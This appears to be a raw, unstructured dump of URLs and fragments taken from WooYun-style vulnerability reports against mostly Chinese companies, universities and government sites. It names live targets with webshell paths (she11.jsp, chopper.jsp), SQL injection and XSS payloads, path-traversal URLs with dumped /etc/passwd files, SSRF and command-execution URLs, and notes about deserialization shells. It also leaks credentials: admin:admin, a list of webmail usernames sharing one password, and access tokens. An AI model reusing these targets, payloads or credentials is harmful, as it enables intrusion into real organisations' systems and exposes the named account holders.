http://www.sinodata.net.cn/Znxs.aspx?cid=155&sid=254 http://**.**.**.**/show_itinerary.asp?seq=92 http://img1.jia.com:7001/ http://bbs.xyp2p.com/admin.php https://www.xyp2p.com/phpmyadmin http://121.14.65.32:8080/building.html http://121.14.65.32:8080/she11.jsp http://**.**.**.**:8081/90.cer http://58.48.109.70 http://**.**.**.**/qyLogin.shtml username:123 password:123456 http://219.232.202.154:8080/#/home http://**.**.**.**/Dept_main_Sms.aspx?id=31&type=1&t=2015 http://service.homelink.com.cn/wct/userfiles/agent/pressImages/shell.jsp http://service.homelink.com.cn/wct/userfiles/agent/pressImages/tunnel.jsp http://service.homelink.com.cn/wct/userfiles/agent/pressImages/chopper.jsp http://www.sinodata.net.cn http://**.**.**.**:7010/Vote.aspx?id=1 http://www.lionfund.com.cn/chatmain.do?id=2463 http://**.**.**.**/login.html http://**.**.**.**/mercTotal.action http://e.dxy.cn/opfracture/node/526#comment-38 http://qkyxjy.haoyisheng.com/ http://qkzgpx.haoyisheng.com/ http://newtopbox.haoyisheng.com/ http://gppx.haoyisheng.com/ http://qkzg.haoyisheng.com/ http://newtopbox.haoyisheng.com:8080/yaoyan/index.jsp?m=Login http://newtopbox.haoyisheng.com:8080/yy/index.jsp http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012 http://**.**.**.**/zxDoctorInformation.aspx?ID=6 http://**.**.**.**/zkClassCaseInfo.aspx?ID=1&Hospital=ZK00000001 http://**.**.**.**/zxQuestion.aspx?DoctorID=1 http://**.**.**.**/202/DoctInfo.aspx?ID=346 http://**.**.**.**/Order202.aspx?Dept_Name= http://**.**.**.**/)存在弱管理员账号,在公网即可管理用户的路由。 http://l.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://gp.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://l.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.9.199.39:7004&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://photo.edufe.com.cn http://sparepart.dfac.com/dfbj/ http://**.**.**.**:7001/ www.xilingxueshan.cn http://www.12301.cc/dlogin_n.html http://www.028xcpw.com/index www.xilingxueshan.cn www.12301.cc http://pmos.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.qh.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.sbd.sx.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://pmos.sgcc.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://mp.weixin.qq.com/wiki/7/1c97470084b73f8e224fe6d9bab1625b.html http://203.195.235.76/jssdk/sample.zip http://quote.cctvcj.com/stock/index.php?stock_code=* http://**.**.**.**:8081/ http://ccce.upc.edu.cn/shiyan/list.asp?id=895 http://ask.jia.com/.svn/entries http://img1.jia.com/.svn/entries http://weixin.jia.com/.svn/entries http://zhuangxiu.jia.com/.svn/entries http://zixun.jia.com/xuetang/.svn/entries http://**.**.**.**/bugs/wooyun-2010-0118263 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**:7080 e61f:13ff:fe2e:7ce2%4 ffff:ffff:fffd%5 http://**.**.**.** http://**.**.**.**/bugs/wooyun-2015-0158293 http://hi.xuekewang.com/index.php?uid=zz01 https://27.115.34.17/epm/ http://www.baopal.com:7001存在反序列化漏洞 http://**.**.**.**:7001 http://**.**.**.**:7001/存在weblogic反序列化命令执行 http://**.**.**.**:7001 http://**.**.**.**:7001/ http://**.**.**.**/ http://**.**.**.**:7001/logonAction.do http://videosection.video.aol.com/application/configs/application.ini http://**.**.**.**:7001 http://googleinstall.anquanxia.com/admin/login http://googleinstall.anquanxia.com http://**.**.**.**/ http://mp.allinpay.com/ http://www.whsw.info:81/whsl/ http://i.ruanmei.com/ qq.com/123456 http://i.ruanmei.com/ http://www.ithome.com/ http://quan.ithome.com/ http://mail.quanyou.com.cn http://www.rayli.com.cn/ http://passport2.chaoxing.com/pwd/getpwd?refer=http%3A%2F%2Fwww.chaoxing.com%2Fchannelcookie%3Ftime%3D1449727680261&fid=0 http://qianbao.lubandai.cn/frontpage/web-qb/index.html erp.csztv.cn/member http://**.**.**.**/new_view.php?pid=513 a96a:8b29:1e87:4157%13 dcfa:401a:2415:202b:f5fa:c5f9 f5fa:c5f9%20 http://e.csztv.cn/menu.php?c=1 system:service=MainDeployer http://*/is.war https://**.**.**.**/timing/order/7498900 http://**.**.**.**:7001/defaultroot/login.jsp http://eip.chinatowercom.cn http://121.35.255.79:7007/存在weblogic,而且这个版本存在java反序列化命令执行漏洞。反弹一个shell。 http://webmail.300.cn/page/login/login.jsp http://pos.bsdglasses.com:7001/ http://product.china-pub.com/ebook4894212 http://ebook.bbbvip.com/soft/aireader.rar http://**.**.**.**:7001/defaultroot/login.jsp http://home.ithaier.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/aspx/connector.aspx http://**.**.**.**/ http://**.**.**.**:7001/defaultroot/login.jsp http://121.8.157.138:88/seeyon/main.do?method=main http://bbs.svw-volkswagen.com http://bbs.svw-volkswagen.com/viewthread2.php?tid=458059 http://newoa.glsc.com.cn:8082/ http://**.**.**.**/bmfw/zxdc/dcwj/index.jsp?id=1172&ic_id=747&text_name=%E6%96%B0%E7%9A%84%E5%BB%BA%E8%AE%AE,id存在注入,布尔类型盲注,丢进神器中。 http://cte.swu.edu.cn/ http://cte.swu.edu.cn/teachered/list.php?bid=35&sid=33 http://**.**.**.**:8112 encap:Ethernet e0:81:da:d3:18 feda:d318/64 Scope:Link MTU:1500 packets:12015417 dropped:172 packets:11464092 txqueuelen:1000 http://58.68.130.68/wis18/customerjsp/msyh/login/login.jsp http://58.68.130.72/wis18/customerjsp/msyh/login/login.jsp中国民生银行在线考试系统 http://**.**.**.**:8080/存在JAVA反序列化命令执行(JBoss),直接命令执行就是system权限,可新建帐户,直接登入3389,进入该公司的工作组内网,严重影响其内网安全。 http://www.easy-linkholiday.com/hotel_detail.asp?id=7930 http://**.**.**.**:8180/webservices/login.action http://bkjyw.swu.edu.cn/ http://bkjyw.swu.edu.cn/index.php/article/index.html?uid=146 http://**.**.**.**/bugs/wooyun-2015-0159690 http://**.**.**.**/cpk/search/productdetail/?&product_no=2671 http://**.**.**.**/cpk/search/?action=search¶m_no=411,461,891,951&age=0,3&agefilter=age http://count.17oh.com/counter1.php?id=6459&sw=1920&sc=24&referer=&page=http%3A%2F%2Fscjg.liyang.gov.cn%2Fdefault.php%3Fmod%3Darticle%26fid%3D15790 http://count.17oh.com/counter2.php?id=6459&upid=&sw=1920&sc=24&referer=&page=http%3A%2F%2Fscjg.liyang.gov.cn%2Fdefault.php%3Fmod%3Darticle%26fid%3D15790 http://www.jxxch.com:8088/yyoa/ http://zzsf.tgbus.com/news/8687.html http://**.**.**.**/actions_index?actionsId=965221 http://wooyun.org/bugs/wooyun-2015-0157025 http://219.143.252.114/left.php http://219.143.252.114/main.php http://219.143.252.114/main.php?item=%B5%D8%B2%FA%BE%C6%B5%EA&data_id=2861 http://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 http://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 http://219.143.252.114/mrjx_list.php?month=9 http://219.143.252.159/mrjx_list.php?month=9* http://219.143.252.159/whynot.php http://admin.job.sinopec.com http://**.**.**.**/ http://123.127.246.26:8080/login.action http://123.127.246.26:8080/she11.jsp http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-0112191 http://www.58pic.com/denglu/主站登录位置,无验证码无登陆限制 http://119.254.105.143/ticket/web/web.go?method=policyCal&showId=060671&seatIds=10210985&key=IF4F8DK1IFS891KF9S8FKFD8 http://119.254.105.222/zabbix/ http://119.254.105.172:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin jiadd:x:501:501::/home/jiadd:/bin/bash huangjp:x:502:502::/home/huangjp:/bin/bash http://career.upc.edu.cn/students/viewDay.asp?action=view&id=3368* http://pe.upc.edu.cn:888/ListScardMore.asp?ID=1* http://sydxb.upc.edu.cn/cmzx/art_list.asp?class=announcement&department=0* http://peetc.upc.edu.cn/Article.asp?id=22* http://sta.upc.edu.cn/show.asp?listid=333* http://peetc.upc.edu.cn/more.asp?typeid=6* http://pe.upc.edu.cn/Admin/login.Asp http://qks.upc.edu.cn/zr/expert.asp http://qks.upc.edu.cn/sk/toVol.asp http://www.bs.ecnu.edu.cn/teacher_ky.asp?id=287 http://www.bs.ecnu.edu.cn/teacher_gz.asp?id=287 http://www.bs.ecnu.edu.cn/teacher_jx.asp?id=287 http://www.bs.ecnu.edu.cn/mta/newshow.asp?id=1578 http://**.**.**.**:8080 http://**.**.**.**/CategoryPage.aspx?pid=1 http://edcard.sinopec.com encap:Ethernet addr:10.5.97.27 Bcast:10.5.97.255 Mask:255.255.255.0 fe88:15fa/64 Scope:Link MTU:1500 packets:1071862366 packets:1738261439 txqueuelen:1000 admin.yunshouyi.net/Contact/Index), http://**.**.**.**/cgxx.aspxjid=100_ http://**.**.**/cgxx.aspxjid=211 http://member.honglingjin.cn/center/delivery_address/list?user_id=40002096939&access_token=60b7d95679cdc14a2e6e1f49d3f61f70 http://**.**.**.**/waplogin_loginIn.hnyxsm http://**.**.**.**/EbsWeb/myInsurance/zhongyiCarQuery.jsp encap:Ethernet fe74:5108/64 Scope:Link MTU:1500 packets:169746533 packets:227658387 http://211.144.203.118:8089/#/login http://www.91xke.com/web.rar http://**.**.**.**/kaoqin/index.php?c=member&m=getmemberinfo&id=15 http://aycrm.anschina.cn/aycrm/viewLogin.action http://oa.anschina.cn:8001/login/Login.jsp?logintype=1 http://www.wddjt.com/indexAction!init http://**.**.**.**/ http://www.cetools.cn/index.php/cetools_admin/index http://www.cetools.cn/uploads/zmobile_demo/b/247E240410E48046414AA74A407C8BBF.jpg http://**.**.**.**/XX_admin/ http://**.**.**.**/bugs/wooyun-2015-0158152 http://community.edufe.com.cn/faq/index.php?faqid=26 http://www.bkzs.sdu.edu.cn www.bkzs.sdu.edu.cn http://**.**.**.**/ http://**.**.**.**:28080/login www.wanglibao.com http://newee.newsmy.com/newee.html http://newee.newsmy.com/neweeDownload/downCenter.php?id=126 http://**.**.**.**/bugs/wooyun-2010-0109170 http://**.**.**.**/bugs/wooyun-2010-0111405 http://**.**.**.**:7001/loadMenu.do?modelNo=13 http://121.14.65.21:8080/building.html http://121.14.65.21:8080/she11.jsp http://**.**.**.**/bugs/wooyun-2010-0101996 http://**.**.**.** health.app.huan.tv/info.php?id=3329&isperson=y&page=1&list=list34&dflist=defaultFocusId1 http://ct.super8.com.cn:8081/TeamBuy.svc http://api.super8.com.cn/TeamBuyConstracts/SeacrhRecommend cn:8081 http://**.**.**.**/index.jsp http://**.**.**.**/game/search?key=1 http://***/?c=utils&m=upload&formname=form2&editname=simg&uppath=static/upfile&pn= http://**.**.**.**/DealLogin.aspx?hz=&action=login&str_username=admin%27%20or%20%271%27%3D%271&str_userpwd=adsfadf&reb=false http://218.78.217.83:7001/ http://180.153.27.8:7001 http://210.51.48.122:7001 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic10:x:500:500::/home/weblogic10:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://www4.tjtc.edu.cn/shekejingpinke/news/shownews.php?id=44 http://**.**.**.**/ShowNews.aspx?sn=15092315420303123200 http://**.**.**.**/city.asp?ClassID=2&ArticleID=23801 http://**.**.**.**/city.asp?ClassID=2&ArticleID=23801 http://www.famouscase.net/search.php http://www.famouscase.net/search.php http://mail.yaic.com.cn/ http://**.**.**.**/blog.php?ptype=news_content&blogid=532 http://**.**.**.**/blog.php?ptype=news_content&blogid=532 http://n http://**.**.**.**/news.asp?id=35748 http://**.**.**.**/news.asp?id=35748 https://**.**.**.**/owa/ http://**.**.**.**:7005/EbsWeb/getUnderwrite.do?firstFlag=true&UIAction=noticeQurey&id=1 http://wsjf.swu.edu.cn:8081/login.aspx http://**.**.**.**/display.jsp?articleId=4384329 http://**.**.**.**/display.jsp?articleId=4384329 http://qmqty.faw.com.cn:8080/qcbin/ http://cyber.swu.edu.cn/ http://cyber.swu.edu.cn/show.php?id=678 http://**.**.**.**/buy/login.asp http://**.**.**.** http://222.168.65.137:7001/ http://**.**.**.**/jobs.html http://**.**.**.** http://**.**.**.**/news.asp?id=48&bh=922 http://**.**.**.**/listnews.asp?id=200&bh=2566 http://**.**.**.**/xywweb/listzhdt.asp?id=257&bh=2519 http://**.**.**.**/listtzgg.asp?id=230&bh=2194 http://credit.midea.com.cn/fckeditor/editor/fckeditor.html直接上传文件 http://**.**.**.**/Account/GetpwdAction2 http://www.flyertrip.com/photels/personalCenter/orderDetail.php?flag=detail&id=7245 http://**.**.**.**/bugs/wooyun-2015-0118263 http://**.**.**.**/bugs/wooyun-2015-0120540 http://**.**.**.**:8060 URL:http://mail.ch.com/ URL:http://mail.tourspring.com/ URL:http://mail.springtour.com/ http://sms.china-sss.com:8080/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.160.249.13:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**//bugs/wooyun-2015-0111086 http://rdbcs.midea.com.cn:8000/ http://rdbcs.midea.com.cn:8000/uddiexplorer/css.jsp http://ku.deshang365.com/api/resource/file_download?id=10287 http://**.**.**.**/bugs/wooyun-2015-0120202 http://**.**.**.** http://**.**.**.**/JBZX/updateFile.aspx http://**.**.**.**/uploads/xunwu/2015.aspx http://**.**.**.**:9191/jybz/login.action存在Java反序列化漏洞执行命令漏洞 CVE:2013-4810 http://202.104.30.80:8000/ http://202.104.30.80/ http://202.104.30.80:8000/uddiexplorer/css.jsp http://202.104.30.80:8000/uddiexplorer/out.jsp http://k.yingjiesheng.com/center/这个地方没有验证码没有登录限制 http://**.**.**.**/console/loginOut http://**.**.**.**/ http://**.**.**.**//bugs/wooyun-2015-0112913 http://**.**.**.**:9999/ThamsWeb/thamsxp/ http://**.**.**.**/bugs/wooyun-2015-0117211 http://**.**.**.**:16080 http://**.**.**.**//bugs/wooyun-2015-0113541 http://**.**.**.**//bugs/wooyun-2015-0102929 http://**.**.**.**:8080 http://**.**.**.**//bugs/wooyun-2015-0110114 http://www.youjuke.com/存在redis未授权访问漏洞 www.youjuke.com,以root权限登录系统 http://shuo.rayli.com.cn/services/service.php?m=user&a=album_share&width=190&home_uid=2303150&album_id=210 http://shuo.rayli.com.cn/services/service.php?m=user&a=album_share&width=190&p=2&home_uid=2303150&album_id=210 http://shuo.rayli.com.cn/services/service.php?m=user&a=shareSelf&width=190&home_uid=2303150 http://**.**.**.**/ManageFrame/Index.aspx http://z.yirendai.com/login http://**.**.**.**:7001 http://**.**.**.**/web.zip http://**.**.**.**:7001/已经进远程ssh,登录服务器 https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult http://data.ku6.com/.git/config http://pay.ku6.com/.svn/entries admin:admin http://**.**.**.**/sea/login.jsp http://fftmail.shfft.com:9000/user/index http://**.**.**.**/index!index.action存在命令执行漏洞 http://**.**.**.**//bugs/wooyun-2015-0113255 http://**.**.**.**:9088/Lzfxfk/expertBaseRegister.action http://**.**.**.**/index.php?s=/Article/detail/column/313/articleid/15860.html http://**.**.**.**/index.php?s=/Article/detail/column/313*/articleid/15860.html http://**.**.**.**//bugs/wooyun-2015-0114191 http://www.huayiyuan.com/ http://movie.weibo.com/rank http://movie.weibo.com/movie/web/follow http://movie.weibo.com.test.com http://**.**.**.**/down/WinMyDNS.rar http://zc.hayao.com:8080/ebvp/infopub/showcontent?id=1001A11000000006CTGP http://**.**.**.**:8080/ http://**.**.**.**:8080 http://**.**.**.**/cxfz/selectInfo2.do http://bug.anquanxia.com/ http://125.218.212.235:81/config/static.php?type=list&id=38 http://**.**.**.**/web.rar http://imbatv.cn/uploads/uploads.zip http://**.**.**.**/bugs/wooyun-2010-0142469 http://**.**.**.**:80/news_show.php?id=7* http://**.**.**.**/contact.php post:message=88952634&name=88952634* http://**.**.**.**/products.php?cl=38* http://**.**.**.**/bugs/wooyun-2010-0109367 http://oa.daojia.58.com/seeyon/main.do http://**.**.**.**/bugs/wooyun-2010-0108834 https://app.wanda.cn/wanda3v/m/ssoLogin.html http://oa.derlook.com/loginAction!loginOut.do http://122.224.64.2:8181/bigzone_cy/login http://hndss.183.ha.cn:7001/ http://**.**.**.**/index.php http://**.**.**.**/product_show.php?id=1%20and%201=1 http://**.**.**.**/bugs/wooyun-2010-0148081 http://**.**.**.**/xcwenda.asp?subtype=%C4%EA%C1%E4%CC%F5%BC%FE&ztype=%B1%A8%C3%FB http://update.mocard.tv:8080/MOSP/receive.do?method=getVersion¶m=","PANEL":"MC-A1","ID":"DK1PS0Z0400","SVNVER":"6607","code":"1406061312","path":"/backup/usb.bin.tmp","brand":"818haier","ThreeD":"enable","DeviceType":"818EVAMOCARD","ChipPlatform":"MST6A818C","Ursa6M40Version":"disable","kernel":"3.1.10 http://oa.my089.cn:7001/defaultroot/login.jsp http://shuhua.e-nci.com/informate/more.jhtml http://shuhua.e-nci.com/informate/searchprize.jhtml?search=1 http://**.**.**.**:7001/defaultroot/login.jsp http://scan.cninsure.net/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://scan.cninsure.net/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd https://github.com/DooiooSource/td-utils/blob/a3c101c3993aee1055b83ac03968a7e030bf1363/src/main/resources/td-mail.properties https://github.com/fqybzhangji/FescoWeChat/tree/1c317dcd2e92157b40ee691062516e4315aeee81 http://**.**.**/WeiXinServiceManager.svc_ http://**.**.**/WFM/FormList3.aspx_ http://webmail.csvw.com/ mibo:1qaz@WSX zhufan:1qaz@WSX ChenKai:1qaz@WSX ZhangSan:1qaz@WSX HuXiaotian:1qaz@WSX ZhangCaifang:1qaz@WSX PengJian2:1qaz@WSX LiaoYulin:1qaz@WSX WangLinghai:1qaz@WSX LiuHui2:1qaz@WSX ChenWei9:1qaz@WSX ZhengQi:1qaz@WSX LiYan:1qaz@WSX YangWei:1qaz@WSX DaiLei:1qaz@WSX LuChaoqi:1qaz@WSX LiuYiqing:1qaz@WSX DuanJianfeng:1qaz@WSX zhangsansan:1qaz@WSX https://ran.svw.cn http://www.kiford.com/forget http://jders.midea.com.cn/Login.aspx http://jders.midea.com.cn/Login.aspx http://**.**.**.**:82/superadmin/adminLogin.action https://oa.xin.com/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:8080/zyhList.do?term_type=b http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**/ylxt/ http://**.**.**.**/ http://**.**.**.**/user_jyxq?from=actorder&orderid=11389 http://**.**.**.**/user_jyxq?from=actorder&orderid=11391 http://**.**.**.**/user_jyxq?from=actorder&orderid=11392 http://learning.bankofshanghai.com/ http://vpn.miaozhen.com http://oa.sy-yy.com:8989/yyoa/ http://enfo.ebpcapital.com/ http://**.**.**.**/bugs/wooyun-2010-0128218 http://**.**.**.**/bugs/wooyun-2010-0108437 http://**.**.**.**/ui/logon/station.jsp?nodecode=1&Flag=XYW&ChangeCom=1&nodesrc=1 admin:admin http://**.**.**.**/civility/login.html http://www.feizhiyi.com/User/buycourse.html http://www.feizhiyi.com/User/createorder.html http://www.feizhiyi.com/public/paymentlink http://**.**.**.**/ http://**.**.**.**/ptzx_website/HTML/ptzx/portal/index/index.htm http://**.**.**.**/ptzx_website/UserCenter/login.aspx http://**.**.**.**/login.asp?id=9 http://gtja.cobo.cn/logon.cobo?encodedId=1449820398679 http://gtja.cobo.cn/portal/org/FindPassword/BO.cobo http://gtja.cobo.cn http://m.yahui.cc/ http://m.yahui.cc/inc/loadMore.php http://www.inke.com.cn:81/Clients/Shops.aspx?Sid=5CCD89751E9B4B968A86ECEFEC244380&state=9 http://115.29.220.93:89/Clients/Shops.aspx?sid=5CCD89751E9B4B968A86ECEFEC244380&state=9 http://dz2th.300.cn//01/vote02/design/ http://dz2th.300.cn//01/vote02/design/py.asp?id=11 http://**.**.**.**/public/ZJJGInfo.aspx?code=176021 http://**.**.**.** http://**.**.**.**/chopper/chopper.jsp http://**.**.**.**/bugs/wooyun-2010-082349 http://**.**.**.**/bugs/wooyun-2010-0144201 http://m.sogou.com/web/searchList.jsp?uID=C9DyoHjANG34kxNk&v=5&e=1427&de=1&pid=sogou-clse-2996962656838a97&dp=1&w=1278&t=1449608685850&s_t=1449608696397&keyword=1@baidu.com%3Cimg+src%3D1+onerror%3Dalert%28%22wooyun%22%29%3E&pg=webSearchList http://219.143.230.134:7001/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin weblogic:x:500:500::/weblogic:/bin/bash ifpcod:x:501:500::/app/cod:/bin/bash ifpuser:x:502:500::/app/ifp:/bin/bash infuser:x:503:500::/app/inf:/bin/bash monitor:x:504:504::/app:/bin/bash splunk:x:505:505:Splunk Server:/opt/splunkforwarder:/bin/bash oem:x:506:500::/home/oem:/bin/bash csair:x:507:507::/app/ftp:/bin/bash mocha:x:888:888::/home/mocha:/bin/bash logviewer:x:889:889::/home/logviewer:/bin/bash viewer:x:890:890::/home/viewer:/bin/bash http://**.**.**.**/bugs/wooyun-2010-0144227 http://**.**.**.**/bugs/wooyun-2010-0144220 http://edu.docer.com http://edu.docer.com/search?keywords=法语 http://**.**.**.**/ http://**.**.**.**/uaw_tb/ http://171.8.66.189/ http://**.**.**.**/index.php?m=xdcms&c=login https://180.153.27.9/ http://180.153.27.154:7001/ http://210.51.48.123/login.jsp http://210.51.48.123:7001/ http://182.248.151.28:7001/ http://182.248.151.26:7001/ http://**.**.**.**/ http://202.204.160.3 http://www.6fires.com/index.html http://183.60.252.182:8081/ http://**.**.**.**/,端口为515,存在反序列化漏洞: http://**.**.**.**/lili/yuanpei/tree/899470dd293061b239741ac2f16486a62a855242/database http://**.**.**.**/ http://**.**.**.**/login.php http://boss.app-store.nubia.cn/ http://www.yugaopian.com/login http://www.yugaopian.com/login http://**.**.**.**:8080/login/Login.jsp?logintype=1 http://**.**.**.**:8080//page/maint/login/Page.jsp?templateId=18 http://zxxs.e21.cn/ http://aero.xmu.edu.cn/ http://aero.xmu.edu.cn/admin/login1.jsp http://121.14.65.122/ http://121.14.65.122/she11.jsp http://www.flyertrip.com/member/login.php http://222.76.211.92:8090/linxuan_API.svc?wsdl http://www.shenmafuli.com/?a=productlist&c=About&fr=&kw=1 http://**.**.**.**/elearning2/home/login.action?course.uuid=3b8d6caa-a19e-11e2-97b7-ac162da4b60d存在命令执行漏洞 http://www.yinlu.com/login.aspx http://**.**.**.**/new.asp?id=922 http://olms.sinopec.com/slmwebapp/ http://**.**.**.**/login.aspx上海实业 http://mae.swu.edu.cn/ http://mae.swu.edu.cn/newsx.php?id=53,参数id http://txj.baomihua.com/ http://wlz.baomihua.com/ http://yxl.baomihua.com/ http://xxcq.baomihua.com http://wz.baomihua.com/ http://qy.baomihua.com/ http://kt.baomihua.com/ userapi.asmx/UserLogin?jsoncallback=jQuery18304828840980174135_1449839526143&userName=111111&password=123456&WGTAGS=0.007041393915503735&_=1449839622552 https://vfs.saicfc.com/vfs2/login.htm https://github.com/Samin-Du/mypackage/blob/a9f29549ed889084b7abb51eb1e753ff7d752b5d/tool/mycmd/conf/my.conf http://**.**.**.**:8001/console/ http://120.55.172.222:7001/tcmp/ http://120.55.172.222:7001/console http://120.55.172.222:7001/ca/ma3.jsp jdbc:oracle:thin:@10.253.2.212:1521:ora10g http://**.**.**.**/member.asp?B=15&S=10 